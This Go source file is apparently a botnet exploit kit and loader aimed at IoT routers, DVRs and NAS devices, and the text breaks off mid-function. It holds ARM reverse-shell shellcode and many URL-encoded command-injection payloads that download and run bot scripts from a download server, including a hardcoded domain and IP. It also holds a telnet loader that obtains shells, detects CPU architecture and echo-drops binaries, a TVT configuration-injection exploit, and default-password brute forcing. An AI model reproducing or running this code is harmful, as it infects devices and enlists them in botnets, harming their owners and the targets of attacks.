loader_multi.go

package main

import (
    "net"
    "time"
    "bufio"
    "fmt"
    "os"
    "sync"
    "strings"
    "strconv"
    "io/ioutil"
    "math/rand"
    "encoding/binary"
    "encoding/base64"
)

/*

Exploit kit framework 1.0.0.

Contains:
Reverse shell loader (DONE)
Telnet loader (arch detect, dir detect, echo load) (DONE)

Exploits:
UCHTTPD (DONE)
TVT-4567 (DONE)
TVT-WEB (DONE)
UNIX CCTV (DONE)
FIBERHOME ROUTER (DONE)
VIGOR ROUTER (DONE)
COMTREND ROUTER (DONE)
GPONFIBER ROUTER (DONE)
BROADCOM ROUTER (DONE)
DVRIP (DONE)
LIBDVR (DONE)
HONGDIAN ROUTER (DONE)
REALTEK MULTI ROUTER (DONE)
TENDA ROUTER (DONE)
TOTOLINK ROUTER (DONE)
ALCATEL NAS (DONE)
LILINDVR (DONE)
LINKSYS ESERIES (DONE)
*/

const (
	EI_NIDENT int = 16
	EI_DATA int = 5
	EE_LITTLE int = 1
	EE_BIG int = 2

	EM_ARM int = 40
	EM_MIPS int = 8
	EM_AARCH64 int = 183
	EM_PPC int = 20
	EM_PPC64 int = 21
	EM_SH int = 42

	DVRIP_NORESP int = 0
	DVRIP_OK int = 100
	DVRIP_FAILED int = 203
	DVRIP_UPGRADED int = 515

    echoLineLen = 128
    echoDlrOutFile = "qn_local"

    loaderTvtWebTag = "selfrep.tvt"
    loaderTvt4567Tag = "selfrep.tvt"
    loaderVigorTag = "selfrep.vigor"
    loaderComtrendTag = "selfrep.comtrend"
    loaderGponfiberTag = "selfrep.gponfiber"
    loaderFiberhomeTag = "selfrep.fiberhome"
    loaderLibdvrTag = "selfrep.libdvr"
    loaderDvripTag = "selfrep.dvrip"
    loaderUchttpdTag = "selfrep.uchttpd"
    loaderHongdianTag = "selfrep.hongdian"
    loaderTendaTag = "selfrep.tenda"
    loaderTotolinkTag = "selfrep.totolink"
    loaderZyxelTag = "selfrep.zyxel"
    loaderAlcatleTag = "selfrep.alcatel"
    loaderLilinTag = "selfrep.lilin"
	loaderLinksysTag = "selfrep.linksys"
	loaderZteTag = "selfrep.zte"
	loaderNetgearTag = "selfrep.netgear"
	loaderDlinkTag = "selfrep.dlink"

    loaderDownloadServer = "1.1.1.1" // Remote IP Of Server With Bins And Sh Files
    loaderBinsLocation = "/a/b/" // Path To Bins
    loaderScriptsLocation = "/a/" // Path To Bins
)

type elfHeader struct {
	e_ident[EI_NIDENT] int8
    e_type, e_machine int16
    e_version int32
}

type smapsRegion struct {
    region uint64
    size, pss, rss int
    shared_clean, shared_ditry int
    private_clean, private_dirty int
}

type echoDropper struct {
    payload [128]string
    payload_count int
}

var (
    netTimeout time.Duration = 30
    workerGroup sync.WaitGroup
    magicGroup sync.WaitGroup
    mode, doExploit string
    exploitMap map[string]interface{}
    dropperMap map[string]echoDropper
)

// counters
var telShells, payloadSent int

var (
	// uc exploit settings
    // should be reverse shell to same ip as loader on port 31391
    uchttpdShellCode string = "\x01\x10\x8f\xe2\x11\xff\x2f\xe1\x11\xa1\x8a\x78\x01\x3a\x8a\x70\x02\x21\x08\x1c\x01\x21\x92\x1a\x0f\x02\x19\x37\x01\xdf\x06\x1c\x0b\xa1\x02\x23\x0b\x80\x10\x22\x02\x37\x01\xdf\x3e\x27\x01\x37\xc8\x21\x30\x1c\x01\xdf\x01\x39\xfb\xd5\x07\xa0\x92\x1a\xc2\x71\x05\xb4\x69\x46\x0b\x27\x01\xdf\x01\x21\x08\x1c\x01\xdf\xc0\x46\xff\xff\x7b\xb4\xb9\x35\x5a\x13\x2f\x62\x69\x6e\x2f\x73\x68\x58\xff\xff\xc0\x46\xef\xbe\xad\xde"
    ucRshellPort int = 31412

    // tvt exploit settings
    tvtWebPayload string = "cd${IFS}/tmp;wget${IFS}http://" + loaderDownloadServer + loaderScriptsLocation + "wget.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}" + loaderTvtWebTag
    tvt4567Payload string = "cd${IFS}/tmp;wget${IFS}http://" + loaderDownloadServer + loaderScriptsLocation + "wget.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}" + loaderTvt4567Tag

	// magic exploit settings
    magicPacketIds []string = []string{"\x62", "\x69", "\x6c", "\x52", "\x44", "\x67", "\x43", "\x4d"}
    magicPorts []int = []int{1000, 2000, 3000, 4000, 5000, 6000, 7000, 8000, 8001, 8002, 8003, 8004, 8005, 8006, 8007, 8008, 8009, 8010, 8020, 8030, 8040, 8050, 8060, 8070, 8080, 8090, 8100, 8200, 8300, 8400, 8500, 8600, 8700, 8800, 8888, 8900, 8999, 9000, 9090}
    magicPayload string = "wget http://rippr.cc/u -O-|sh;"
	
    // lilindvr payload
	lilinPayload string = "wget -O- http://" + loaderDownloadServer + "/l|sh"

	// fiberhome exploit settings
    fiberRandPort int = 1 // 0 for use below
    fiberStaticPort int = 31784
    fiberSecStrs []string = []string{"0.3123525368318707", "0.13378587435314315", "0.8071510413685209"}

	// vigor exploit settings
    vigorPayload string = "bin%2Fsh%24%7BIFS%7D-c%24%7BIFS%7D%27cd%24%7BIFS%7D%2Ftmp%24%7BIFS%7D%26%26%24%7BIFS%7Dbusybox%24%7BIFS%7Dwget%24%7BIFS%7Dhttp%3A%2F%2F" + loaderDownloadServer + loaderBinsLocation + "bot.arm7%24%7BIFS%7D%26%26%24%7BIFS%7Dchmod%24%7BIFS%7D777%24%7BIFS%7Dbot.arm7%24%7BIFS%7D%26%26%24%7BIFS%7D.%2Fbot.arm7%24%7BIFS%7D" + loaderVigorTag + "%24%7BIFS%7D%26%26%24%7BIFS%7Drm%24%7BIFS%7D-rf%24%7BIFS%7Dbot.arm7"

	// broadcom router settings
	broadcomPayload string = "$(wget%20http://" + loaderDownloadServer + "/b%20-O-|sh)"

	// hongdian router settings
	hongdianPayload string = "cd+/tmp%3Bbusybox+wget+http://" + loaderDownloadServer + loaderScriptsLocation + "wget.sh+-O-+>sfs;chmod+777+sfs%3Bsh+sfs+" + loaderHongdianTag + "%3Brm+-rf+sfs"

	// tenda router settings
	tendaPayload string = "cd%20/tmp%3Brm%20wget.sh%3Bwget%20http%3A//" + loaderDownloadServer + loaderScriptsLocation + "wget.sh%3Bchmod%20777%20wget.sh%3Bsh%20wget.sh%20" + loaderTendaTag

	// totlink router settings
	totolinkPayload string = "wget%20http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%20-O%20-%20%3Esplash.sh%3B%20chmod%20777%20splash.sh%3B%20sh%20splash.sh%20" + loaderTotolinkTag

	// zyxel nas settings
	zyxelPayload string = "cd%20/tmp;wget%20http://" + loaderDownloadServer + loaderScriptsLocation + "wget.sh%20-O-%20>s;chmod%20777%20s;sh%20s%20" + loaderZyxelTag + ";"
	zyxelPayloadTwo string = "cd+%2Ftmp%3Bwget+http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%3Bchmod+777+wget.sh%3Bsh+wget.sh+" + loaderZyxelTag + "%3Brm+-rf+wget.sh"

	// alcatel nas settings
	alcatelPayload string = "cd${IFS}/tmp;wget${IFS}http://" + loaderDownloadServer + loaderScriptsLocation + "wget.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}" + loaderAlcatleTag

	// linksys router settings
	linksysPayload string = "cd+%2Ftmp%3Bwget+http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%3Bsh+wget.sh+" + loaderLinksysTag + "%3Brm+-rf+wget.sh"
	linksysTwoPayload string = "cd+%2Ftmp%3Bwget+http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%3Bchmod+777+wget.sh%3Bsh+wget.sh+" + loaderLinksysTag + "%3Brm+-rf+wget.sh"

	// zte router settings
	ztePayload string = "cd+%2Ftmp%3Bwget+http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%3Bchmod+777+wget.sh%3Bsh+wget.sh+" + loaderZyxelTag + "%3Brm+-rf+wget.sh"

	// netgear router settings
	netgearPayload string = "cd+%2Ftmp%3Bwget+http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%3Bchmod+777+wget.sh%3Bsh+wget.sh+" + loaderNetgearTag + "%3Brm+-rf+wget.sh"

	// gpon router settings
	gponOGPayload string = "wget+http%3A%2F%2F" + loaderDownloadServer + "%2Fg+-O-%7Csh%60%3Bwget+http%3A%2F%2F37.0.11.220%2Fg+-O-%7Csh"

	// dlink router settings
	dlinkTwoPayload string = "cd+%2Ftmp%3Bwget+http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%3Bchmod+777+wget.sh%3Bsh+wget.sh+" + loaderDlinkTag + "%3Brm+-rf+wget.sh"
	dlinkThreePayload string = "cd /tmp;wget http://" + loaderDownloadServer + "/a/wget.sh;chmod 777 wget.sh;sh wget.sh " + loaderDlinkTag + ";rm -rf wget.sh"
)

func zeroByte(a []byte) {

    for i := range a {
        a[i] = 0
    }
}

func getStringInBetween(str string, start string, end string) (result string) {

    s := strings.Index(str, start)
    if s == -1 {
        return
    }

    s += len(start)
    e := strings.Index(str, end)

    if (s > 0 && e > s + 1) {
        return str[s:e]
    } else {
        return "null"
    }
}

func randStr(strlen int) (string) {

	var b strings.Builder

    rand.Seed(time.Now().UnixNano())
    chars := []rune("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz")

    for i := 0; i < strlen; i++ {
        b.WriteRune(chars[rand.Intn(len(chars))])
    }

    return b.String()
}

func hexToInt(hexStr string) (uint64) {
    cleaned := strings.Replace(hexStr, "0x", "", -1)
    result, _ := strconv.ParseUint(cleaned, 16, 64)
    return uint64(result)
}

/*        TELNET LOADER MODULE         */

func telnetLoadDroppers() {

    files, err := ioutil.ReadDir("dlrs")
    if err != nil {
        fmt.Printf("\033[1;31mError: Failed to open dlrs/\r\n")
        os.Exit(0)
    }

    for i := 0; i < len(files); i++ {
        file, err := os.OpenFile("dlrs/" + files[i].Name(), os.O_RDONLY, 0755)
        if err != nil {
            continue
        }

        mapVal := echoDropper{}
        mapVal.payload_count = 0

        for {
            var echoString string
            dataBuf := make([]byte, echoLineLen)

            length, err := file.Read(dataBuf)
            if err != nil || length <= 0 {
                break
            }

            for i := 0; i < length; i++ {
                echoByte := fmt.Sprintf("\\x%02x", uint8(dataBuf[i]))
                echoString += echoByte
            }

            if mapVal.payload_count == 0 {
                mapVal.payload[mapVal.payload_count] = fmt.Sprintf("echo -ne \"%s\" > ", echoString)
            } else {
                mapVal.payload[mapVal.payload_count] = fmt.Sprintf("echo -ne \"%s\" >> ", echoString)
            }

            mapVal.payload_count++
        }

        dropperMap[files[i].Name()] = mapVal
        file.Close()
    }

    fmt.Printf("\x1b[38;5;46mLoader\x1b[38;5;15m: \x1b[38;5;15mLoaded \x1b[38;5;134m%d\x1b[38;5;15m echo droppers\x1b[38;5;15m\x1b[38;5;15m\r\n", len(dropperMap))
}

func telnetHasPrompt(buffer string) (bool) {

	if strings.Contains(buffer, "#") || strings.Contains(buffer, ">") || strings.Contains(buffer, "$") || strings.Contains(buffer, "%") || strings.Contains(buffer, "@") {
		return true
	} else {
		return false
	}
}

func telnetBusyboxShell(conn net.Conn) {

	/* Looks wierd but dw its for some BCM router */
	conn.Write([]byte("sh\r\n"))
	conn.Write([]byte("..\r\n"))
	conn.Write([]byte("linuxshell\r\n"))
	/* ------------------------------------------ */

	conn.Write([]byte("enable\r\n"))
	conn.Write([]byte("development\r\n"))
	conn.Write([]byte("system\r\n"))
	conn.Write([]byte("sh\r\n"))
	conn.Write([]byte("shell\r\n"))
	conn.Write([]byte("ping ; sh\r\n"))
}

func telnetDropDropper(conn net.Conn, myarch string) (bool) {

    for arch, mapval := range dropperMap {
        splitVal := strings.Split(arch, ".")
        if len(splitVal) != 2 {
            continue
        }

        if splitVal[1] == myarch {
            query := randStr(5)
            dropper := randStr(5)
            droppedLines := 0

            for i := 0; i < mapval.payload_count; i++ {
                var rdbuf []byte = []byte("")
                complete := 0

                conn.Write([]byte(mapval.payload[i] + dropper + "; /bin/busybox " + query + "\r\n"))

                for {
                    tmpbuf := make([]byte, 128)
                    ln, err := conn.Read(tmpbuf)
                    if ln <= 0 || err != nil {
                        break
                    }

                    rdbuf = append(rdbuf, tmpbuf...)
                    if strings.Contains(string(rdbuf), ": applet not found") {
                        complete = 1
                        break
                    }
                }

                if complete == 0 {
                    return false
                }

                droppedLines++
            }

            if droppedLines == mapval.payload_count {
                var rdbuf []byte = []byte("")

                conn.Write([]byte("chmod 777 " + dropper + "; ./" + dropper + "; rm -rf " + dropper + "; /bin/busybox " + query + "\r\n"))

                for {
                    tmpbuf := make([]byte, 128)
                    ln, err := conn.Read(tmpbuf)
                    if ln <= 0 || err != nil {
                        break
                    }

                    rdbuf = append(rdbuf, tmpbuf...)
                    if strings.Contains(string(rdbuf), ": applet not found") {
                        return true
                    }
                }

                return false
            } else {
                return false
            }
        } else {
            continue
        }
    }

    return false
}

func telnetHasBusybox(conn net.Conn) (bool, string) {

	var rdbuf []byte = []byte("")

	query := randStr(6)
	resp := ": applet not found"

	conn.Write([]byte("/bin/busybox " + query + "\r\n"))
	for {
	    tmpbuf := make([]byte, 128)
		ln, err := conn.Read(tmpbuf)
		if ln <= 0 || err != nil {
		    break
		}

		rdbuf = append(rdbuf, tmpbuf...)
		if strings.Contains(string(rdbuf), resp) == true {
			index := strings.Index(string(rdbuf), "BusyBox v")
			if index == -1 {
				return true, "unknown"
			} else {
				verstr := strings.Split(string(rdbuf)[len("BusyBox v")+index:], " ")
				if len(verstr) > 0 {
					return true, verstr[0]
				} else {
					return true, "unknown"
				}
				
			}
		}
	}

	return false, "unknown"
}

func telnetWritableDir(conn net.Conn) (bool, string) {

	var rdbuf []byte
	dirs := []string{"/tmp/", "/var/tmp/", "/var/", "/mnt/", "/etc/", "/", "/dev/"}

	for i := 0; i < len(dirs); i++ {
		echoStr := randStr(4)
		conn.Write([]byte("cd " + dirs[i] + " && echo " + echoStr + "\r\n"))

		for {
		    tmpbuf := make([]byte, 128)
			ln, err := conn.Read(tmpbuf)
			if ln <= 0 || err != nil {
			    break
			}

			rdbuf = append(rdbuf, tmpbuf...)
			if strings.Contains(string(rdbuf), "can't cd") || strings.Contains(string(rdbuf), "No such file or") {
				break
			} else if strings.Contains(string(rdbuf), echoStr) {
				return true, dirs[i]
			}
		}

		zeroByte(rdbuf)
	}

	return false, "none"
}

func telnetExtractArch(conn net.Conn) (bool, string) {

	var rdbuf []byte
	var index int = -1

	conn.Write([]byte("/bin/busybox cat /bin/echo\r\n"))

	for {
		tmpbuf := make([]byte, 128)
		ln, err := conn.Read(tmpbuf)
		if ln <= 0 || err != nil {
			break
		}

		rdbuf = append(rdbuf, tmpbuf...)
		index = strings.Index(string(rdbuf), "ELF")

		if index != -1 {
			zeroByte(tmpbuf)
			ln, err := conn.Read(tmpbuf)

			if ln <= 0 || err != nil {
				break
			}

			rdbuf = append(rdbuf, tmpbuf...)
			break
		}
	}

	if index == -1 {
		return false, "none"
	}

	rdbuf = rdbuf[index:]
	elfHdr := elfHeader{}

	for i := 0; i < EI_NIDENT; i++ {
		elfHdr.e_ident[i] = int8(rdbuf[i])
	}

	elfHdr.e_type = int16(rdbuf[EI_NIDENT])
	elfHdr.e_machine = int16(rdbuf[EI_NIDENT + 2])
	elfHdr.e_version = int32(rdbuf[EI_NIDENT + 2 + 2])

	if elfHdr.e_machine == int16(EM_ARM) {
		return true, "arm"
	} else if elfHdr.e_machine == int16(EM_MIPS) {
		if elfHdr.e_ident[EI_DATA] == int8(EE_LITTLE) {
			return true, "mpsl"
		} else {
			return true, "mips"
		}
	} else if elfHdr.e_machine == int16(EM_PPC) || elfHdr.e_machine == int16(EM_PPC64) {
		return true, "ppc"
	} else if elfHdr.e_machine == int16(EM_SH) {
		return true, "sh4"
	}

	return false, ""
}

func telnetLoader(target string, dologin int, arch string, tag string) {

	var (
		rdbuf []byte = []byte("")
		loggedIn int = 0
	)

	conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return    
    }

    if dologin == 0 {
	    for {
	    	tmpbuf := make([]byte, 128)
		    ln, err := conn.Read(tmpbuf)
		    if ln <= 0 || err != nil {
		    	break
		    }

		    rdbuf = append(rdbuf, tmpbuf...)
		    if telnetHasPrompt(string(rdbuf)) == true {
		    	loggedIn = 1
		    	break
		    }
	    }
	}

    zeroByte(rdbuf)
	if loggedIn == 0 {
		conn.Close()
		return
	}

	fmt.Printf("\x1b[38;5;46mTelnet\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m shell found on device\x1b[38;5;15m\x1b[38;5;15m\r\n", target)
	telnetBusyboxShell(conn)

	has, ver := telnetHasBusybox(conn)
	if has == false {
		conn.Close()
		return
	}

	fmt.Printf("\x1b[38;5;46mTelnet\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m device is running busybox version \x1b[38;5;134m%s\x1b[38;5;15m\r\n", target, ver)
    telShells++

	has, dir := telnetWritableDir(conn)
	if has == false {
		conn.Close()
		return
	}

	fmt.Printf("\x1b[38;5;46mTelnet\x1b[38;5;15m: \x1b[38;5;134m%s:v%s\x1b[38;5;15m found writable directory \x1b[38;5;134m%s\x1b[38;5;15m\r\n", target, ver, dir)

    has, _ = telnetHasBusybox(conn)
    if has == false {
        conn.Close()
        return
    }

	fmt.Printf("\x1b[38;5;46mTelnet\x1b[38;5;15m: \x1b[38;5;134m%s:v%s:%s\x1b[38;5;15m extracted arch \x1b[38;5;134m%s\x1b[38;5;15m\r\n", target, ver, dir, arch)
    
    dropped := telnetDropDropper(conn, arch)
    if dropped == false {
        conn.Close()
        return
    }

    fmt.Printf("\x1b[38;5;46mTelnet\x1b[38;5;15m: \x1b[38;5;134m%s:v%s:%s:%s\x1b[38;5;15m finnished echo loading\x1b[38;5;15m\r\n", target, ver, dir, arch)
    
    binName := randStr(6)
    conn.Write([]byte("/bin/busybox cat " + echoDlrOutFile + " > " + binName + "; chmod 777 " + binName + "; ./" + binName + " " + tag + "\r\n"))
    // Done?
    time.Sleep(5 * time.Second)  
    conn.Close()
    return   
}

/* ------ END OF TELNET LOADER ------- */

/* ------ OTHER PROTOCOL STUFF ------- */

func reverseShellUchttpdLoader(conn net.Conn) {

	var (
		rdbuf []byte = []byte("")
		query string = randStr(5)
	)

	conn.Write([]byte(">/tmp/.h && cd /tmp/\r\n"))
	conn.Write([]byte(">/mnt/.h && cd /mnt/\r\n"))
	conn.Write([]byte(">/var/.h && cd /var/\r\n"))
	conn.Write([]byte(">/dev/.h && cd /dev/\r\n"))
	conn.Write([]byte(">/var/tmp/.h && cd /var/tmp/\r\n"))
	conn.Write([]byte("/bin/busybox " + query + "\r\n"))

	for {
		tmpbuf := make([]byte, 128)
		ln, err := conn.Read(tmpbuf)
		if ln <= 0 || err != nil {
			conn.Close()
			return
		}

		rdbuf = append(rdbuf, tmpbuf...)
		if strings.Contains(string(rdbuf), ": applet not found") {
			break
		}
	}

	zeroByte(rdbuf)
	
    dropped := telnetDropDropper(conn, "arm7")
    if dropped == false {
        conn.Close()
        return
    }

    fmt.Printf("\x1b[38;5;46mUchttpd\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", conn.RemoteAddr())
    payloadSent++
    binName := randStr(6)
    conn.Write([]byte("/bin/busybox cat " + echoDlrOutFile + " > " + binName + "; chmod 777 " + binName + "; ./" + binName + " " + loaderUchttpdTag + ";\r\n"))
	conn.Write([]byte("/var/Sofia 2>/dev/null &\r\n"))
	return
}

func infectFunctionTvt4567(conn net.Conn) {

    var (
        rdbuf []byte = []byte("")
        state = 0
    )

    payload := "\x0c\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x21\x00\x02\x00\x01\x00\x04\x00\x50\x02\x00\x00\x50\x02\x00\x00\x00\x00\x00\x00\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x75\x74\x66\x2d\x38\x22\x3f\x3e\x3c\x72\x65\x71\x75\x65\x73\x74\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x73\x79\x73\x74\x65\x6d\x54\x79\x70\x65\x3d\x22\x4e\x56\x4d\x53\x2d\x39\x30\x30\x30\x22\x20\x63\x6c\x69\x65\x6e\x74\x54\x79\x70\x65\x3d\x22\x57\x45\x42\x22\x3e\x3c\x74\x79\x70\x65\x73\x3e\x3c\x66\x69\x6c\x74\x65\x72\x54\x79\x70\x65\x4d\x6f\x64\x65\x3e\x3c\x65\x6e\x75\x6d\x3e\x72\x65\x66\x75\x73\x65\x3c\x2f\x65\x6e\x75\x6d\x3e\x3c\x65\x6e\x75\x6d\x3e\x61\x6c\x6c\x6f\x77\x3c\x2f\x65\x6e\x75\x6d\x3e\x3c\x2f\x66\x69\x6c\x74\x65\x72\x54\x79\x70\x65\x4d\x6f\x64\x65\x3e\x3c\x61\x64\x64\x72\x65\x73\x73\x54\x79\x70\x65\x3e\x3c\x65\x6e\x75\x6d\x3e\x69\x70\x3c\x2f\x65\x6e\x75\x6d\x3e\x3c\x65\x6e\x75\x6d\x3e\x69\x70\x72\x61\x6e\x67\x65\x3c\x2f\x65\x6e\x75\x6d\x3e\x3c\x65\x6e\x75\x6d\x3e\x6d\x61\x63\x3c\x2f\x65\x6e\x75\x6d\x3e\x3c\x2f\x61\x64\x64\x72\x65\x73\x73\x54\x79\x70\x65\x3e\x3c\x2f\x74\x79\x70\x65\x73\x3e\x3c\x63\x6f\x6e\x74\x65\x6e\x74\x3e\x3c\x73\x77\x69\x74\x63\x68\x3e\x74\x72\x75\x65\x3c\x2f\x73\x77\x69\x74\x63\x68\x3e\x3c\x66\x69\x6c\x74\x65\x72\x54\x79\x70\x65\x20\x74\x79\x70\x65\x3d\x22\x66\x69\x6c\x74\x65\x72\x54\x79\x70\x65\x4d\x6f\x64\x65\x22\x3e\x72\x65\x66\x75\x73\x65\x3c\x2f\x66\x69\x6c\x74\x65\x72\x54\x79\x70\x65\x3e\x3c\x66\x69\x6c\x74\x65\x72\x4c\x69\x73\x74\x20\x74\x79\x70\x65\x3d\x22\x6c\x69\x73\x74\x22\x3e\x3c\x69\x74\x65\x6d\x54\x79\x70\x65\x3e\x3c\x61\x64\x64\x72\x65\x73\x73\x54\x79\x70\x65\x20\x74\x79\x70\x65\x3d\x22\x61\x64\x64\x72\x65\x73\x73\x54\x79\x70\x65\x22\x2f\x3e\x3c\x2f\x69\x74\x65\x6d\x54\x79\x70\x65\x3e\x3c\x69\x74\x65\x6d\x3e\x3c\x73\x77\x69\x74\x63\x68\x3e\x74\x72\x75\x65\x3c\x2f\x73\x77\x69\x74\x63\x68\x3e\x3c\x61\x64\x64\x72\x65\x73\x73\x54\x79\x70\x65\x3e\x69\x70\x3c\x2f\x61\x64\x64\x72\x65\x73\x73\x54\x79\x70\x65\x3e\x3c\x69\x70\x3e\x24\x28"
    payload += tvt4567Payload
    payload += "\x3c\x2f\x69\x70\x3e\x3c\x2f\x69\x74\x65\x6d\x3e\x3c\x2f\x66\x69\x6c\x74\x65\x72\x4c\x69\x73\x74\x3e\x3c\x2f\x63\x6f\x6e\x74\x65\x6e\x74\x3e\x3c\x2f\x72\x65\x71\x75\x65\x73\x74\x3e\x00"
    payload = base64.StdEncoding.EncodeToString([]byte(payload))

    cntlen := strconv.Itoa(len(payload))

    conn.Write([]byte("{D79E94C5-70F0-46BD-965B-E17497CCB598}"))

    for {
        tmpbuf := make([]byte, 128)
        ln, err := conn.Read(tmpbuf)
        if ln <= 0 || err != nil {
            break
        }

        rdbuf = append(rdbuf, tmpbuf...)
        if strings.Contains(string(rdbuf), "{D79E94C5-70F0-46BD-965B-E17497CCB598}") && state != 1 {
            conn.Write([]byte("GET /saveSystemConfig HTTP/1.1\r\nAuthorization: Basic\r\nContent-type: text/xml\r\nContent-Length: " + cntlen + "\r\n{D79E94C5-70F0-46BD-965B-E17497CCB598} 2\r\n\r\n" + payload + "\r\n\r\n"))
            zeroByte(rdbuf)
            state = 1
            continue
        } else if strings.Contains(string(rdbuf), "200") && state == 1 {
            fmt.Printf("\x1b[38;5;46mTvt-4567\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", conn.RemoteAddr().String())
            conn.Close()
            payloadSent++
            return
        }
    }

    conn.Close()
}

func infectFunctionMagicProto(target string) {

    var (
        rdbuf []byte = []byte("")
        state = 0
    )

    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        magicGroup.Done()
        return
    }

    payloadOne := "\x5a\xa5\x06\x15\x00\x00\x00\x98\x00\x00\x00"
    payloadTwo := "\x00\x00\x00\x00\x00\x00\x00\x00\x47\x4d\x54\x2b\x30\x39\x3a\x30\x30\x20\x53\x65\x6f\x75\x6c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x74\x69\x6d\x65\x2e\x6e\x69\x73\x74\x2e\x67\x6f\x76\x26"
    payloadThree := "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00"

    conn.Write([]byte("\x5a\xa5\x01\x20\x00\x00\x00\x00"))

    for {
        tmpbuf := make([]byte, 128)
        ln, err := conn.Read(tmpbuf)
        if ln <= 0 || err != nil {
            break
        }

        rdbuf = append(rdbuf, tmpbuf...)
        if state == 0 && len(rdbuf) >= 4 && string(rdbuf[:4]) == "\x5a\xa5\x01\x20" {
            conn.Close()

            conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
            if err != nil {
                magicGroup.Done()
                return 
            }

            payload := payloadOne
            payload += magicPacketIds[state]
            payload += payloadTwo
            payload += magicPayload + "f"
            payload += payloadThree

            conn.Write([]byte(payload))
            state++
            zeroByte(rdbuf)
            continue
        } else if state >= 1 {
            conn.Close()

            if state == 8 {
                fmt.Printf("\x1b[38;5;46mMagic\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m potential payload sent to device\x1b[38;5;15m\r\n", target)
                payloadSent++
                magicGroup.Done()
                return
            }
            conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
            if err != nil {
                magicGroup.Done()
                return 
            }

            payload := payloadOne
            payload += magicPacketIds[state]
            payload += payloadTwo
            payload += magicPayload + "f"
            payload += payloadThree
            
            conn.Write([]byte(payload))
            state++
            zeroByte(rdbuf)
            continue
        }
    }

    conn.Close()
    magicGroup.Done()
    return
}

func infectFunctionLibdvrProto(host string, attempt int) (int, error, string, int) {

	var gotAdmin int = 0
	var gotShell int = 0
	var password string
	var rInt int = 0

	rInt = rand.Intn(9999 - 9000) + 9000

    conn, err := net.DialTimeout("tcp", host, time.Duration(10) * time.Second)
    if err != nil {
        return 0, nil, "", 0
    }

    defer conn.Close()
    conn.SetWriteDeadline(time.Now().Add(6 * time.Second))
    _, err = conn.Write([]byte("/bin/busybox BOXOFABOX\n"))
    if err != nil {
    	conn.Close()
        return 0, nil, "", 0
    }

    conn.SetReadDeadline(time.Now().Add(6 * time.Second))

    first_buf := make([]byte, 256)
    l, err := conn.Read(first_buf)
    if err != nil || l <= 0 {
        conn.Close()
        return 0, nil, "", 0
    }

    if strings.Contains(string(first_buf), "user name") || strings.Contains(string(first_buf), "username") {
		_, err = conn.Write([]byte("admin\n"))
		if err != nil {
			conn.Close()
		    return 0, nil, "", 0
		}
    } else {
    	if strings.Contains(string(first_buf), "BOXOFABOX: applet not found") {
    		gotShell = 1
    	} else {
		    _, err = conn.Write([]byte("\n"))
		    if err != nil {
		    	conn.Close()
		        return 0, nil, "", 0
		    }

		    conn.SetReadDeadline(time.Now().Add(3 * time.Second))
		    first_buf := make([]byte, 256)
		    l, err := conn.Read(first_buf)
		    if err != nil || l <= 0 {
		        conn.Close()
		        return 0, nil, "", 0
		    }

		    if !strings.Contains(string(first_buf), "user name") && !strings.Contains(string(first_buf), "username") {
		    	if strings.Contains(string(first_buf), "admin$") {
		    		gotAdmin = 1
		    	} else {
		    		conn.Close()
		    		return 0, nil, "", 0
		    	}
		    } else {
			    _, err = conn.Write([]byte("admin\n"))
			    if err != nil {
			    	conn.Close()
			        return 0, nil, "", 0
			    }
		    }
    	}
    }

   	if gotAdmin != 1 && gotShell != 1 {
	    conn.SetReadDeadline(time.Now().Add(3 * time.Second))
	    second_buf := make([]byte, 256)
	    l2, err := conn.Read(second_buf)
	    if err != nil || l2 <= 0 {
	        conn.Close()
	        return 0, nil, "", 0
	    }

	    if strings.Contains(string(second_buf), "pass word") || strings.Contains(string(second_buf), "password") {
	    	if attempt == 0 {
	    		password = "I0TO5Wv9"
	    	} else if attempt == 1 {
	    		password = "123456"
	    	} else if attempt == 2 {
	    		password = "admin"
	    	}

		    _, err = conn.Write([]byte(password + "\n"))
		    if err != nil {
		    	conn.Close()
		        return 0, nil, "", 0
		    }

		    conn.SetReadDeadline(time.Now().Add(3 * time.Second))
		    second_buf := make([]byte, 1024)
		    l, err := conn.Read(second_buf)
		    if err != nil || l <= 0 {
		        conn.Close()
		        return 0, nil, "", 0
		    }

		    if strings.Contains(string(second_buf), "admin$") {
		    	gotAdmin = 1
		    } else {
